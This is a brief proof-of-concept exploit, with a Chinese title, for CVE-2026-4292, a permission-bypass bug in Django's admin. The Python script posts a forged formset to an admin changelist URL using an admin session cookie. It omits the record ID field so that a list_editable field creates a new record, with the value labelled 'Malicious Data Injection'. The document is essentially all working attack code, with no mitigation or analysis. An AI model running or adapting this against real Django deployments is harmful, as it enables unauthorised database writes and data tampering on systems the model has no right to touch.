CVE-2026-4292 Django权限绕过漏洞

import requests # Target Django Admin Changelist URL target_url = 'http://target-domain.com/admin/myapp/mymodel/' # Admin session cookie (Required PR:H) admin_cookies = {'sessionid': 'valid_admin_session_id'} # Forged POST data to exploit list_editable # Omitting the ID field 'form-0-id' to trigger creation in vulnerable versions payload_data = { 'form-TOTAL_FORMS': '1', 'form-INITIAL_FORMS': '0', 'form-MIN_NUM_FORMS': '0', 'form-MAX_NUM_FORMS': '1000', # The field marked as list_editable in ModelAdmin 'form-0-protected_field': 'Malicious Data Injection', } try: response = requests.post(target_url, data=payload_data, cookies=admin_cookies) if response.status_code == 200: print("[+] Request sent successfully. Check database for new instance.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"Error: {e}")